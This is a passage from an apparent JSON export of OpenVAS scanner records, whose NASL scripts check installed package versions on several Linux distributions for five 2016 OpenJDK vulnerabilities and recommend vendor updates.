rpm:\"java-1_7_0-openjdk-bootstrap-debugsource~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-devel\", rpm:\"java-1_7_0-openjdk-bootstrap-devel~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-devel-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-headless\", rpm:\"java-1_7_0-openjdk-bootstrap-headless~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-headless-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless\", rpm:\"java-1_7_0-openjdk-headless~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-headless-debuginfo~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.101~22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:36:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-07T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for java-1_7_0-openjdk (SUSE-SU-2016:1250-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851302", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851302\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-07 05:19:54 +0200 (Sat, 07 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for java-1_7_0-openjdk (SUSE-SU-2016:1250-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for java-1_7_0-openjdk to version 2.6.6 fixes five security\n issues.\n\n These security issues were fixed:\n\n - CVE-2016-0686: Ensure thread consistency (bsc#976340).\n\n - CVE-2016-0687: Better byte behavior (bsc#976340).\n\n - CVE-2016-0695: Make DSA more fair (bsc#976340).\n\n - CVE-2016-3425: Better buffering of XML strings (bsc#976340).\n\n - CVE-2016-3427: Improve JMX connections (bsc#976340).\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1250-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.101~30.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.101~30.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.101~30.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless\", rpm:\"java-1_7_0-openjdk-headless~1.7.0.101~30.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-headless-debuginfo~1.7.0.101~30.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless\", rpm:\"java-1_7_0-openjdk-headless~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-headless-debuginfo~1.7.0.101~30.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T18:45:46", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for java-1.7.0-openjdk (EulerOS-SA-2016-1015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220161015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161015", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1015\");\n script_version(\"2020-02-18T10:52:53+0000\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 10:52:53 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:38:09 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for java-1.7.0-openjdk (EulerOS-SA-2016-1015)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1015\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1015\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'java-1.7.0-openjdk' package(s) announced via the EulerOS-SA-2016-1015 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws were discovered in the Serialization and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.(CVE-2016-0686, CVE-2016-0687)\n\nIt was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws. (CVE-2016-3427)\n\nIt was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.(CVE-2016-3425)\n\nIt was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures.The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.(CVE-2016-0695)\");\n\n script_tag(name:\"affected\", value:\"'java-1.7.0-openjdk' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-headless\", rpm:\"java-1.7.0-openjdk-headless~1.7.0.101~2.6.6.1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:57:34", "description": "Check the version of java", "cvss3": {}, "published": "2016-04-22T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0676 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310882469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882469", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882469\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-22 05:17:14 +0200 (Fri, 22 Apr 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0676 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.7.0-openjdk packages provide the\nOpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0676\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-April/021840.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "description": "Check the version of java", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2016:0723 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882488", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2016:0723 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882488\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:20:04 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for java CESA-2016:0723 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of java\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide\nthe OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.\n\nSecurity Fix(es):\n\n * Multiple flaws were discovered in the Serialization and Hotspot\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to completely bypass Java sandbox restrictions. (CVE-2016-0686,\nCVE-2016-0687)\n\n * It was discovered that the RMI server implementation in the JMX component\nin OpenJDK did not restrict which classes can be deserialized when\ndeserializing authentication credentials. A remote, unauthenticated\nattacker able to connect to a JMX port could possibly use this flaw to\ntrigger deserialization flaws. (CVE-2016-3427)\n\n * It was discovered that the JAXP component in OpenJDK failed to properly\nhandle Unicode surrogate pairs used as part of the XML attribute values.\nSpecially crafted XML input could cause a Java application to use an\nexcessive amount of memory when parsed. (CVE-2016-3425)\n\n * It was discovered that the Security component in OpenJDK failed to check\nthe digest algorithm strength when generating DSA signatures. The use of a\ndigest weaker than the key strength could lead to the generation of\nsignatures that were weaker than expected. (CVE-2016-0695)\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0723\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021861.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.39~1.13.11.0.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.39~1.13.11.0.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.39~1.13.11.0.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.39~1.13.11.0.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.39~1.13.11.0.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:56:51", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-693)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120682", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120682", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120682\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:11:58 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-693)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in OpenJDK. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.7.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-693.html\");\n script_cve_id(\"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-0686\", \"CVE-2016-3427\", \"CVE-2016-0687\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = 